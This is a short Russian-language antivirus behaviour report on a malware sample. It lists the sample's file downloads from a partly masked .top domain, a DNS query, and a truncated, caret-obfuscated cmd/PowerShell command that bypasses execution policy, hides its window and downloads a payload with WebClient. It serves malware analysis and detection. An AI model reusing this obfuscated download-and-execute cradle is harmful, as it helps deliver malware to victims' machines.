Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "Po^wErSH^e^ll^.EXE -ExE^c^u^Ti^OnpOLI^Cy ByPA^Ss ^-n^o^P^r^OF^i^l^e ^-wINDOWSTylE Hid^DeN ^(N^E^W-^O^B^J^E^CT Sy^stEm.nE^t.weBCL^ieN^t).^DOw^nLoAd^f^i^L^e('http://fo###repu.top...
Сетевая активность
UDP
- DNS ASK fo###repu.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "Po^wErSH^e^ll^.EXE -ExE^c^u^Ti^OnpOLI^Cy ByPA^Ss ^-n^o^P^r^OF^i^l^e ^-wINDOWSTylE Hid^DeN ^(N^E^W-^O^B^J^E^CT Sy^stEm.nE^t.weBCL^ieN^t).^DOw^nLoAd^f^i^L^e('http://fo###repu.top...' (со скрытым окном)
